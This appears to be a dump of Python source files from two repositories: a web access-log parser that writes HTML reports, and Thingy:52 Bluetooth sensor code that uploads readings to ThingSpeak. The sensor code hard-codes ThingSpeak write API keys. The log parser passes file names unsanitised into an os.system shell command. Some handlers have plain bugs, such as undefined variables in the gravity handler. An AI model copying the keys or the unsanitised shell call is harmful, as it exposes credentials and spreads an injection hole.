minutes.append(':'.join(log_time_list[0:3])) minutes.append(':'.join(log_time_list[2:3])) if match_method == 'POST': method_counts['post'] += 1 if match_method == 'GET': method_counts['get'] += 1 urls.append(match_method + ' ' + url) if 'cost_time_index' in log_format.keys(): request_cost_time = int(float(match.group(log_format.get('cost_time_index'))) * 1000) if cost_time_flag: cost_time_list.append({'time': log_time, 'cost_time': request_cost_time}) else: cost_time_list.append({'time': '', 'cost_time': request_cost_time}) if 'status' in log_format.keys(): status_code = int(match.group(log_format.get('status'))) if status_code in status_codes.keys(): status_codes[status_code] += 1 else: status_codes.setdefault(status_code, 1) if len(times) > 2: cross_time = datetime.datetime.strptime(times[-1], '%d/%b/%Y:%H:%M:%S') - datetime.datetime.strptime(times[0], '%d/%b/%Y:%H:%M:%S') else: cross_time = None # 计算PV、UV、平均请求数、GET/POST占比 pv = len(times) uv = len(set(hosts)) response_avg = int(pv / len(set(times))) method_counts['post_percentile'] = int(method_counts['post'] * 100 / pv) method_counts['get_percentile'] = int(method_counts['get'] * 100 / pv) # 获取每小时、每分钟、每秒的请求数量 hours_counter = Counter(hours) minutes_counter = Counter(minutes) times_counter = Counter(times) # 获取每秒最大请求数及其请求时间 response_most_common = times_counter.most_common(1)[0] response_peak = response_most_common[1] response_peak_time = response_most_common[0] # 根据不同URL的PV数量截取较多请求,后续只分析进去排名内的URL urls_counter = Counter(urls) urls_most_common = urls_counter.most_common(config.urls_most_number) # 计算请求占比 url_data_list = [] for_url_data_uri_index = [] for item in urls_most_common: if item[1] >= config.urls_pv_threshold: ratio = '%0.3f' % float(item[1] * 100 / float(pv)) url_data_list.append(URLData(url=item[0], pv=item[1], ratio=ratio)) for_url_data_uri_index.append(item[0]) continue if cross_time and cross_time.seconds < config.urls_pv_threshold_time and item[1] >= config.urls_pv_threshold_min: ratio = '%0.3f' % 
float(item[1] * 100 / float(pv)) url_data_list.append(URLData(url=item[0], pv=item[1], ratio=ratio)) for_url_data_uri_index.append(item[0]) continue # 第二次读取文件,以获取特定请求的访问时间及响应时间 with open('../data/' + target_file, 'rb') as f: for line in f: match = pattern.match(str(line,encoding="utf8")) if match is None: continue method = match.group(log_format.get('method_index')) url = get_url(match, log_format) target_url = ' '.join([method, url]) if target_url in for_url_data_uri_index: index = for_url_data_uri_index.index(target_url) url_data_list[index].time.append(match.group(log_format.get('time_index'))) if 'cost_time_index' in log_format.keys(): url_data_list[index].cost.append(float(match.group(log_format.get('cost_time_index')))) for url_data in url_data_list: # 计算每个特定请求的每秒最大并发 url_data.peak = Counter(url_data.time).most_common(1)[0][1] # 计算每个特定请求的耗时均值,中值,方差,百分位等 if url_data.cost: url_data.cost_time['avg'] = '%0.3f' % float(average(url_data.cost)) url_data.cost_time['variance'] = int(var(url_data.cost)) url_data.cost_time['p9'] = '%0.3f' % percentile(url_data.cost, 90) url_data.cost_time['p8'] = '%0.3f' % percentile(url_data.cost, 80) url_data.cost_time['p5'] = '%0.3f' % percentile(url_data.cost, 50) # 统计不同响应时间范围的请求数量 cost_time_range = {'r1': 0, 'r2': 0, 'r3': 0, 'r4': 0, 'r5': 0, 'r6': 0, 'r7': 0, 'r8': 0, 'r9': 0, 'r10': 0, 'r11': 0} for cost_time in cost_time_list: if cost_time['cost_time'] <= 50: cost_time_range['r1'] += 1 elif 50 < cost_time['cost_time'] <= 100: cost_time_range['r2'] += 1 elif 100 < cost_time['cost_time'] <= 150: cost_time_range['r3'] += 1 elif 150 < cost_time['cost_time'] <= 200: cost_time_range['r4'] += 1 elif 200 < cost_time['cost_time'] <= 250: cost_time_range['r5'] += 1 elif 250 < cost_time['cost_time'] <= 300: cost_time_range['r6'] += 1 elif 300 < cost_time['cost_time'] <= 350: cost_time_range['r7'] += 1 elif 350 < cost_time['cost_time'] <= 400: cost_time_range['r8'] += 1 elif 400 < cost_time['cost_time'] <= 450: cost_time_range['r9'] += 1 
elif 450 < cost_time['cost_time'] <= 500: cost_time_range['r10'] += 1 else: cost_time_range['r11'] += 1 # 计算不同响应时间范围的请求占比 cost_time_range_percentile = {'r1p': 0, 'r2p': 0, 'r3p': 0, 'r4p': 0, 'r5p': 0, 'r6p': 0, 'r7p': 0, 'r8p': 0, 'r9p': 0, 'r10p': 0, 'r11p': 0} if cost_time_list: total_cost_time_pv = float(len(cost_time_list)) if cost_time_range['r1']: cost_time_range_percentile['r1p'] = '%0.3f' % float(cost_time_range['r1'] * 100 / total_cost_time_pv) if cost_time_range['r2']: cost_time_range_percentile['r2p'] = '%0.3f' % float(cost_time_range['r2'] * 100 / total_cost_time_pv) if cost_time_range['r3']: cost_time_range_percentile['r3p'] = '%0.3f' % float(cost_time_range['r3'] * 100 / total_cost_time_pv) if cost_time_range['r4']: cost_time_range_percentile['r4p'] = '%0.3f' % float(cost_time_range['r4'] * 100 / total_cost_time_pv) if cost_time_range['r5']: cost_time_range_percentile['r5p'] = '%0.3f' % float(cost_time_range['r5'] * 100 / total_cost_time_pv) if cost_time_range['r6']: cost_time_range_percentile['r6p'] = '%0.3f' % float(cost_time_range['r6'] * 100 / total_cost_time_pv) if cost_time_range['r7']: cost_time_range_percentile['r7p'] = '%0.3f' % float(cost_time_range['r7'] * 100 / total_cost_time_pv) if cost_time_range['r8']: cost_time_range_percentile['r8p'] = '%0.3f' % float(cost_time_range['r8'] * 100 / total_cost_time_pv) if cost_time_range['r9']: cost_time_range_percentile['r9p'] = '%0.3f' % float(cost_time_range['r9'] * 100 / total_cost_time_pv) if cost_time_range['r10']: cost_time_range_percentile['r10p'] = '%0.3f' % float(cost_time_range['r10'] * 100 / total_cost_time_pv) if cost_time_range['r11']: cost_time_range_percentile['r11p'] = '%0.3f' % float(cost_time_range['r11'] * 100 / total_cost_time_pv) total_data = {'pv': pv, 'uv': uv, 'response_avg': response_avg, 'response_peak': response_peak, 'response_peak_time': response_peak_time, 'url_data_list': url_data_list, 'source_file': target_file, 'hours_hits': hours_counter, 'minutes_hits': 
minutes_counter, 'second_hits': times_counter, 'cost_time_list': cost_time_list, 'cost_time_flag': cost_time_flag, 'cost_time_range_percentile': cost_time_range_percentile, 'method_counts': method_counts, 'cost_time_percentile_flag': cost_time_percentile_flag, 'cost_time_threshold': config.cost_time_threshold, 'cost_time_range': cost_time_range, 'status_codes': status_codes} generate_web_log_parser_report(total_data) def parse_log_file_with_goaccess(target_file): source_file = '../data/' + target_file goaccess_file = '../result/report/' + target_file + '_GoAccess.html' command = """ goaccess -f %(file)s -a -q \ --time-format=%(time_format)s \ --date-format=%(date_format)s \ --log-format='%(goaccess_log_format)s' \ --no-progress > %(goaccess_file)s""" \ % {'file': source_file, 'time_format': config.time_format, 'date_format': config.date_format, 'goaccess_log_format': config.goaccess_log_format, 'goaccess_file': goaccess_file} os.system(command) def main(): log_format = parse_log_format() result_files = [result_file.replace('.html', '') for result_file in get_dir_files('../result/report/')] target_files = sorted([data_file for data_file in get_dir_files('../data') if data_file not in result_files]) for target_file in target_files: try: print(datetime.datetime.now(), ' Start parse file : ' + target_file) parse_log_file(target_file, log_format) if config.goaccess_flag: parse_log_file_with_goaccess(target_file) print(datetime.datetime.now(), ' End parse file: ' + target_file) except Exception: exstr = traceback.format_exc() print(exstr) update_index_html() if __name__ == '__main__': main()
Python
399
40.107769
139
/web-log-parser/bin/start.py
0.561639
0.541519
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import configparser class Config: """get config from the ini file""" def __init__(self, config_file): all_config = configparser.RawConfigParser() with open(config_file, 'r',encoding="UTF-8") as cfg_file: all_config.readfp(cfg_file) self.log_format = all_config.get('format', 'log-format') self.log_pattern = all_config.get('format', 'log-pattern') self.support_method = all_config.get('filter', 'support_method').split(',') self.is_with_parameters = int(all_config.get('filter', 'is_with_parameters')) self.always_parameter_keys = all_config.get('filter', 'always_parameter_keys').split(',') self.urls_most_number = int(all_config.get('filter', 'urls_most_number')) self.urls_pv_threshold = int(all_config.get('filter', 'urls_pv_threshold')) self.urls_pv_threshold_time = int(all_config.get('filter', 'urls_pv_threshold_time')) self.urls_pv_threshold_min = int(all_config.get('filter', 'urls_pv_threshold_min')) self.ignore_url_suffix = all_config.get('filter', 'ignore_url_suffix').split(',') self.fixed_parameter_keys = all_config.get('filter', 'fixed_parameter_keys').split(',') self.custom_parameters_list = all_config.get('filter', 'custom_parameters').split(',') self.custom_keys = [] self.custom_parameters = {} for item in self.custom_parameters_list: key = item.split('=')[0] if len(item.split('=')) == 2: value = item.split('=')[1] else: value = '' self.custom_parameters.setdefault(key, value) self.custom_keys.append(key) self.ignore_urls = all_config.get('filter', 'ignore_urls').split(',') self.static_file = all_config.get('filter', 'static-file').split(',') self.second_line_flag = int(all_config.get('report', 'second_line_flag')) self.cost_time_flag = int(all_config.get('report', 'cost_time_flag')) self.cost_time_percentile_flag = int(all_config.get('report', 'cost_time_percentile_flag')) self.cost_time_threshold = all_config.get('report', 'cost_time_threshold') self.upload_flag = int(all_config.get('report', 'upload_flag')) self.upload_url = 
all_config.get('report', 'upload_url') self.goaccess_flag = int(all_config.get('goaccess', 'goaccess_flag')) self.time_format = all_config.get('goaccess', 'time-format') self.date_format = all_config.get('goaccess', 'date-format') self.goaccess_log_format = all_config.get('goaccess', 'goaccess-log-format') config = Config('../conf/config.ini')
Python
53
49.754719
99
/web-log-parser/bin/config.py
0.617472
0.615613
siguangzong/Web_Log_Tool
refs/heads/master
# -*- coding:utf-8 -*- import json import requests from util import get_dir_files from config import config from jinja2 import Environment, FileSystemLoader env = Environment(loader=FileSystemLoader('./templates')) report_template = env.get_template('report.html') index_template = env.get_template('index.html') url_template = env.get_template('url.html') def upload_report(data, hours_times, minutes_times): target_file = data['source_file'] pv = data['pv'] uv = data['uv'] get_count = data['method_counts']['get'] get_percent = data['method_counts']['get_percentile'] post_count = data['method_counts']['post'] post_percent = data['method_counts']['post_percentile'] response_peak = data['response_peak'] response_peak_time = data['response_peak_time'] response_avg = data['response_avg'] hours_times = hours_times hours_pv = data['hours_hits'] hours_most_common = data['hours_hits'].most_common(1)[0] hours_pv_peak = hours_most_common[1] hours_pv_peak_time = hours_most_common[0] minute_times = minutes_times minute_pv = data['minutes_hits'] minute_most_common = data['minutes_hits'].most_common(1)[0] minute_pv_peak = minute_most_common[1] minute_pv_peak_time = minute_most_common[0] cost_percent = data['cost_time_range_percentile'] cost_time_threshold = data['cost_time_threshold'] cost_range = data['cost_time_range'] url_data_list = [] for url_data in data['url_data_list']: url_data_list.append(url_data.get_data()) data = {'target_file': target_file, 'pv': pv, 'uv': uv, 'get_count': get_count, 'get_percent': get_percent, 'post_count': post_count, 'post_percent': post_percent, 'response_peak': response_peak, 'response_peak_time': response_peak_time, 'response_avg': response_avg, 'hours_times': hours_times, 'hours_pv': hours_pv, 'hours_pv_peak': hours_pv_peak, 'hours_pv_peak_time': hours_pv_peak_time, 'minute_times': minute_times, 'minute_pv': minute_pv, 'minute_pv_peak': minute_pv_peak, 'minute_pv_peak_time': minute_pv_peak_time, 'cost_percent': cost_percent, 
'cost_percent_range': ['<50ms', '50~100ms', '100~150ms', '150~200ms', '200~250ms', '250~300ms', '300~350ms', '350~400ms', '400~450ms', '450~500ms', '>500ms'], 'cost_time_threshold': cost_time_threshold, 'url_data_list': url_data_list, 'cost_range': cost_range, 'status_codes': data['status_codes']} headers = {'Content-Type': 'application/json'} r = requests.post(config.upload_url, data=json.dumps(data), headers=headers) print(r.text) def generate_web_log_parser_report(data): if config.goaccess_flag: data.setdefault('goaccess_file', data.get('source_file') + '_GoAccess.html') data.setdefault('goaccess_title', u'查看GoAccess生成报告') else: data.setdefault('goaccess_file', '#') data.setdefault('goaccess_title', u'GoAccess报告已设置为无效,无法查看') hours_times = sorted(list(data.get('hours_hits'))) minutes_times = sorted(list(data.get('minutes_hits'))) seconds_times = sorted(list(data.get('second_hits'))) if config.upload_flag: upload_report(data, hours_times, minutes_times) html = report_template.render(data=data, web_log_urls_file=data.get('source_file') + '_urls.html', second_line_flag=config.second_line_flag, hours_times=hours_times, minutes_times=minutes_times, seconds_times=seconds_times, method_counts=data.get('method_counts'), cost_time_range_percentile=data.get('cost_time_range_percentile'), cost_time_list=data.get('cost_time_list'), cost_time_flag=data.get('cost_time_flag'), cost_time_percentile_flag=data.get('cost_time_percentile_flag'), cost_time_threshold=data.get('cost_time_threshold'), cost_time_range=data.get('cost_time_range'), status_codes=data.get('status_codes'), status_codes_keys=data.get('status_codes').keys()) html_file = '../result/report/' + data.get('source_file') + '.html' with open(html_file, 'wb') as f: f.write((html.encode('utf-8'))) def generate_web_log_parser_urls(data): html = url_template.render(data=data, url_datas=sorted(data.get('urls'))) html_file = '../result/urls/' + data.get('source_file') + '_urls.html' with open(html_file, 'wb') as f: 
f.write((html.encode('utf-8'))) def update_index_html(): html = index_template.render(files=sorted(get_dir_files('../result/report/'))) with open('../result/index.html', 'wb') as f: f.write((html.encode('utf-8')))
Python
118
43.110168
107
/web-log-parser/bin/report.py
0.578482
0.564842
Nimunex/TFG
refs/heads/master
from bluepy import btle from bluepy.btle import Peripheral, DefaultDelegate import Services from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate ## Thingy52 Definition class Device(Peripheral): ##Thingy:52 module. Instance the class and enable to get access to the Thingy:52 Sensors. #The addr of your device has to be know, or can be found by using the hcitool command line #tool, for example. Call "> sudo hcitool lescan" and your Thingy's address should show up. def __init__(self, addr): Peripheral.__init__(self, addr, addrType="random") #Thingy configuration service not implemented self.battery = BatterySensor(self) self.environment = EnvironmentService(self) self.ui = UserInterfaceService(self) self.motion = MotionService(self) #self.sound = SoundService(self)
Python
22
40.31818
107
/Device.py
0.69255
0.686254
Nimunex/TFG
refs/heads/master
##################################################################### # BLE devices handler # # A new subprocess is created for each preregistered device in: # # ./devices.mac # ##################################################################### import subprocess import time #~ mac_file = open('devices.mac', 'r') #~ for mac_address in mac_file: #~ subprocess.call(['gnome-terminal', '-e', 'python3 main.py ' + mac_address]) #~ time.sleep(10) subprocess.call(['gnome-terminal', '-e', 'python3 main.py FD:88:50:58:E7:45' ]) time.sleep(20) subprocess.call(['gnome-terminal', '-e', 'python3 mainMotion.py E4:F6:C5:F7:03:39' ])
Python
18
40
85
/call.py
0.451219
0.418699
Nimunex/TFG
refs/heads/master
from bluepy import btle from bluepy.btle import UUID,Peripheral, DefaultDelegate import os.path import struct import sys import binascii from urllib.request import urlopen import bitstring import fxpmath from bitstring import BitArray from fxpmath import Fxp #Useful functions def write_uint16(data, value, index): ## Write 16bit value into data string at index and return new string data = data.decode('utf-8') # This line is added to make sure both Python 2 and 3 works return '{}{:02x}{:02x}{}'.format( data[:index*4], value & 0xFF, value >> 8, data[index*4 + 4:]) def write_uint8(data, value, index): ## Write 8bit value into data string at index and return new string data = data.decode('utf-8') # This line is added to make sure both Python 2 and 3 works return '{}{:02x}{}'.format( data[:index*2], value, data[index*2 + 2:]) def getTimeStamp(): ts = time.time() ts_str = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') return ts_str #API key for environment services WRITE_API = "AZOKZQAG2ZC1P2Z2" BASE_URL = "https://api.thingspeak.com/update?api_key={}".format(WRITE_API) #API key for motion services WRITE_API_2 = "L8IVUKY6GII5QP95" BASE_URL_2 = "https://api.thingspeak.com/update?api_key={}".format(WRITE_API_2) ThingSpeakPrevSec = 0 ThingSpeakInterval = 20 # 20 seconds ## Definition of all UUID used for Environment Service CCCD_UUID = 0x2902 ##Environment UUID ENVIRONMENT_SERVICE_UUID = "ef680200-9b35-4933-9B10-52FFA9740042" TEMPERATURE_CHAR_UUID = "ef680201-9b35-4933-9B10-52FFA9740042" PRESSURE_CHAR_UUID = "ef680202-9b35-4933-9B10-52FFA9740042" HUMIDITY_CHAR_UUID = "ef680203-9b35-4933-9B10-52FFA9740042" GAS_CHAR_UUID = "ef680204-9b35-4933-9B10-52FFA9740042" COLOR_CHAR_UUID = "ef680205-9b35-4933-9B10-52FFA9740042" CONFIG_CHAR_UUID = "ef680206-9b35-4933-9B10-52FFA9740042" ##Battery UUID BATTERY_SERVICE_UUID = 0x180F BATTERY_LEVEL_UUID = 0x2A19 ##UI UUID USER_INTERFACE_SERVICE_UUID = "ef680300-9b35-4933-9B10-52FFA9740042" LED_CHAR_UUID = 
"ef680301-9b35-4933-9B10-52FFA9740042" BUTTON_CHAR_UUID = "ef680302-9b35-4933-9B10-52FFA9740042" EXT_PIN_CHAR_UUID = "ef680303-9b35-4933-9B10-52FFA9740042" ##Motion UUID MOTION_SERVICE_UUID = "ef680400-9b35-4933-9B10-52FFA9740042" TAP_CHAR_UUID = "ef680402-9b35-4933-9B10-52FFA9740042" ORIENTATION_CHAR_UUID = "ef680403-9b35-4933-9B10-52FFA9740042" QUATERNION_CHAR_UUID = "ef680404-9b35-4933-9B10-52FFA9740042" STEP_COUNTER_CHAR_UUID = "ef680405-9b35-4933-9B10-52FFA9740042" RAW_DATA_CHAR_UUID = "ef680406-9b35-4933-9B10-52FFA9740042" EULER_CHAR_UUID = "ef680407-9b35-4933-9B10-52FFA9740042" ROTATION_MATRIX_CHAR_UUID = "ef680408-9b35-4933-9B10-52FFA9740042" HEADING_CHAR_UUID = "ef680409-9b35-4933-9B10-52FFA9740042" GRAVITY_VECTOR_CHAR_UUID = "ef68040A-9b35-4933-9B10-52FFA9740042" M_CONFIG_CHAR_UUID = "ef680401-9b35-4933-9B10-52FFA9740042" ## Notification handles used in notification delegate ##Environment handles temperature_handle = None pressure_handle = None humidity_handle = None gas_handle = None color_handle = None ##Battery handles battery_handle = None ##UI handles button_handle = None ##Motion handles tap_handle = None orient_handle = None quaternion_handle = None stepcount_handle = None rawdata_handle = None euler_handle = None rotation_handle = None heading_handle = None gravity_handle = None ## Notifications /Indications Handler class DeviceDelegate(DefaultDelegate): def handleNotification(self, hnd, data): ##Environment delegate if (hnd == temperature_handle): data = bytearray(data) temperature_int = data[0] temperature_dec = data[1] print("A notification was received -> Temperature:", temperature_int, ',', temperature_dec, "ºC") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp = BASE_URL + "&field1={:.2f}".format(temperature_int + temperature_dec*0.01) conn = urlopen(thingspeakHttp) print("Response: {}".format(conn.read())) conn.close() elif (hnd == pressure_handle): teptep = binascii.b2a_hex(data) 
pressure_int = 0 for i in range(0, 4): pressure_int += (int(teptep[i*2:(i*2)+2], 16) << 8*i) pressure_dec = int(teptep[-2:], 16) print("A notification was received -> Pressure: ", pressure_int,',', pressure_dec, " hPa") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp2 = BASE_URL + "&field2={:.2f}".format(pressure_int + pressure_dec*0.01) conn = urlopen(thingspeakHttp2) print("Response: {}".format(conn.read())) conn.close() elif (hnd == humidity_handle): data = bytearray(data) humidity_value =int.from_bytes(data, byteorder='big', signed=False) # timestamp = getTimeStamp() print("A notification was received -> Humidity: ", humidity_value, " %") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp3 = BASE_URL + "&field3={:.2f}".format(humidity_value) conn = urlopen(thingspeakHttp3) print("Response: {}".format(conn.read())) conn.close() elif (hnd == gas_handle): teptep = binascii.b2a_hex(data) eco2 = 0 tvoc = 0 for i in range(0, 2): eco2 += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(2, 4): tvoc += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-2)) print("A notification was received -> Gas: ", eco2, " ppm", tvoc,"ppb") #~ if time() - ThingSpeakPrevSec > ThingSpeakInterval: #~ ThingSpeakPrevSec = time() thingspeakHttp4 = BASE_URL + "&field3={:.2f}".format(eco2) conn = urlopen(thingspeakHttp4) print("Response: {}".format(conn.read())) conn.close() elif (hnd == color_handle): teptep = binascii.b2a_hex(data) red = 0 green = 0 blue = 0 clear = 0 for i in range(0, 2): red += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(2, 4): green += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-2)) for i in range(4, 6): blue += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-4)) for i in range(6, 8): clear += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-6)) print("A notification was received -> Color: ", red, green, blue, clear) thingspeakHttp13 = BASE_URL + "&field5={:.2f}".format(red) conn = 
urlopen(thingspeakHttp13) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp14 = BASE_URL + "&field6={:.2f}".format(green) conn = urlopen(thingspeakHttp14) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp15 = BASE_URL + "&field7={:.2f}".format(blue) conn = urlopen(thingspeakHttp15) print("Response: {}".format(conn.read())) conn.close() ##Battery delegate elif (hnd == battery_handle): data = bytearray(data) battery_value = data[0] print("A notification was received -> Battery:", battery_value, "%") ##UI delegate elif (hnd == button_handle): data = bytearray(data) button = data[0] print("A notification was received -> Button[1-> pressed]: ", button) thingspeakHttp6 = BASE_URL + "&field8={:}".format(button) conn = urlopen(thingspeakHttp6) print("Response: {}".format(conn.read())) conn.close() ##Motion delegate elif (hnd == tap_handle): data = bytearray(data) tap = data[0] count = data[1] if tap == 0x01: print("A notification was received -> TAP_X_UP, count: ", count) elif tap == 0x02: print("A notification was received -> TAP_X_DOWN, count: ", count) elif tap == 0x03: print("A notification was received -> TAP_Y_UP, count: ", count) elif tap == 0x04: print("A notification was received -> TAP_Y_DOWN, count: ", count) elif tap == 0x05: print("A notification was received -> TAP_Z_UP, count: ", count) elif tap == 0x06: print("A notification was received -> TAP_Z_DOWN, count: ", count) elif (hnd == orient_handle): data = bytearray(data) orientation = data[0] if orientation == 0x00: print("A notification was received -> Orientation: Portrait ") elif orientation == 0x01: print("A notification was received -> Orientation: Landscape ") elif orientation == 0x02: print("A notification was received -> Orientation: Reverse Portrait ") elif orientation == 0x03: print("A notification was received -> Orientation: Reverse Landscape ") elif (hnd == quaternion_handle): #True if this is negative number negative = False result = 0 #check oldest bit 
if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] w = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 w = -1. * (float(result) / 1073741823.) else: #this is positive w = float(result) / 1073741823. #~ print( "{:.4f}".format( resultF )) #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 24 result += data[6] << 16 result += data[5] << 8 result += data[4] x = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 x = -1. * (float(result) / 1073741823.) else: #this is positive x = float(result) / 1073741823. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 24 result += data[10] << 16 result += data[9] << 8 result += data[8] y = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 y = -1. * (float(result) / 1073741823.) else: #this is positive y = float(result) / 1073741823. #True if this is negative number negative = False result = 0 #check oldest bit if data[15] & 0x80: negative = True result = data[15] << 24 result += data[14] << 16 result += data[13] << 8 result += data[12] z = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 z = -1. * (float(result) / 1073741823.) else: #this is positive z = float(result) / 1073741823. 
print("A notification was received -> Quaternion(w,x,y,z): {:.2f}, {:.2f}, {:.2f}, {:.2f}".format(w,x,y,z)) elif (hnd == stepcount_handle): teptep = binascii.b2a_hex(data) steps = 0 time = 0 for i in range(0, 4): steps += (int(teptep[i*2:(i*2)+2], 16) << 8*i) for i in range(4, 8): time += (int(teptep[i*2:(i*2)+2], 16) << 8*(i-4)) print("A notification was received -> Stepcount(steps,time): ", steps, time) #~ print('Notification: Step Count: {}'.format(teptep)) elif (hnd == rawdata_handle): ##Accelerometer #True if this is negative number negative = False result = 0 #check oldest bit if data[1] & 0x80: negative = True result = data[1] << 8 result += data[0] ax = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 ax = -1. * (float(result) / 1023.) else: #this is positive ax = float(result) / 1023. #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 8 result += data[2] ay = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 ay = -1. * (float(result) / 1023.) else: #this is positive ay = float(result) / 1023. #True if this is negative number negative = False result = 0 #check oldest bit if data[5] & 0x80: negative = True result = data[5] << 8 result += data[4] az = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 az = -1. * (float(result) / 1023.) else: #this is positive az = float(result) / 1023. ##Gyroscope #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 8 result += data[6] gx = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gx = -1. * (float(result) / 31.) else: #this is positive gx = float(result) / 31. #True if this is negative number negative = False result = 0 #check oldest bit if data[9] & 0x80: negative = True result = data[9] << 8 result += data[8] gy = 0. 
if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gy = -1. * (float(result) / 31.) else: #this is positive gy = float(result) / 31. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 8 result += data[10] gz = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 gz = -1. * (float(result) / 31.) else: #this is positive gz = float(result) / 31. ##Compass #True if this is negative number negative = False result = 0 #check oldest bit if data[13] & 0x80: negative = True result = data[13] << 8 result += data[12] cx = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cx = -1. * (float(result) / 15.) else: #this is positive cx = float(result) / 15. #True if this is negative number negative = False result = 0 #check oldest bit if data[15] & 0x80: negative = True result = data[15] << 8 result += data[14] cy = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cy = -1. * (float(result) / 15.) else: #this is positive cy = float(result) / 15. #True if this is negative number negative = False result = 0 #check oldest bit if data[17] & 0x80: negative = True result = data[17] << 8 result += data[16] cz = 0. if negative: #this is negative result = (1 << 16) - 1 - result result = result+1 cz = -1. * (float(result) / 15.) else: #this is positive cz = float(result) / 15. print("A notification was received -> Raw data: Accelerometer(G):{:.2f}, {:.2f}, {:.2f} Gyroscope(deg/s): {:.2f}, {:.2f}, {:.2f} Compass(uT): {:.2f}, {:.2f}, {:.2f}".format(ax,ay,az,gx,gy,gz,cx,cy,cz)) elif (hnd == euler_handle): #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] roll = 0. 
if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 roll = -1. * (float(result) / 65535.) else: #this is positive roll = float(result) / 65535. #~ print( "{:.4f}".format( resultF )) #True if this is negative number negative = False result = 0 #check oldest bit if data[7] & 0x80: negative = True result = data[7] << 24 result += data[6] << 16 result += data[5] << 8 result += data[4] pitch = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 pitch = -1. * (float(result) / 65535.) else: #this is positive pitch = float(result) / 65535. #True if this is negative number negative = False result = 0 #check oldest bit if data[11] & 0x80: negative = True result = data[11] << 24 result += data[10] << 16 result += data[9] << 8 result += data[8] yaw = 0. if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 yaw = -1. * (float(result) / 65535.) else: #this is positive yaw = float(result) / 65535. print("A notification was received -> Euler(roll,pitch,yaw)[degrees]: {:.2f}, {:.2f}, {:.2f}".format(roll,pitch,yaw)) thingspeakHttp7 = BASE_URL_2 + "&field1={:.2f}".format(roll) conn = urlopen(thingspeakHttp7) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp8 = BASE_URL_2 + "&field2={:.2f}".format(pitch) conn = urlopen(thingspeakHttp8) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp9 = BASE_URL_2 + "&field3={:.2f}".format(yaw) conn = urlopen(thingspeakHttp9) print("Response: {}".format(conn.read())) conn.close() elif (hnd == rotation_handle): teptep = binascii.b2a_hex(data) print('Notification: Rotation matrix: {}'.format(teptep)) elif (hnd == heading_handle): #True if this is negative number negative = False result = 0 #check oldest bit if data[3] & 0x80: negative = True result = data[3] << 24 result += data[2] << 16 result += data[1] << 8 result += data[0] heading = 0. 
if negative: #this is negative result = (1 << 32) - 1 - result result = result+1 heading = -1. * (float(result) / 65535.) else: #this is positive heading = float(result) / 65535. print("A notification was received -> Heading(degrees): ", heading) elif (hnd == gravity_handle): d2=data[0:4] [gx] = struct.unpack('f', d2) d3=data[4:8] [gy] = struct.unpack('f', d3) d4=data[8:12] [gz] = struct.unpack('f', d4) print("A notification was received -> Gravity(x,y,z): {:.2f}, {:.2f}, {:.2f}".format(gx,gy,gz)) thingspeakHttp10 = BASE_URL_2 + "&field1={:.2f}".format(roll) conn = urlopen(thingspeakHttp10) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp11 = BASE_URL_2 + "&field2={:.2f}".format(pitch) conn = urlopen(thingspeakHttp11) print("Response: {}".format(conn.read())) conn.close() thingspeakHttp12 = BASE_URL_2 + "&field3={:.2f}".format(yaw) conn = urlopen(thingspeakHttp12) print("Response: {}".format(conn.read())) conn.close() class EnvironmentService(): ##Environment service module. Instance the class and enable to get access to the Environment interface. serviceUUID = ENVIRONMENT_SERVICE_UUID temperature_char_uuid = TEMPERATURE_CHAR_UUID pressure_char_uuid = PRESSURE_CHAR_UUID humidity_char_uuid = HUMIDITY_CHAR_UUID gas_char_uuid = GAS_CHAR_UUID color_char_uuid = COLOR_CHAR_UUID config_char_uuid = CONFIG_CHAR_UUID def __init__(self, periph): self.periph = periph self.environment_service = None self.temperature_char = None self.temperature_cccd = None self.pressure_char = None self.pressure_cccd = None self.humidity_char = None self.humidity_cccd = None self.gas_char = None self.gas_cccd = None self.color_char = None self.color_cccd = None self.config_char = None def enable(self): ##Enables the class by finding the service 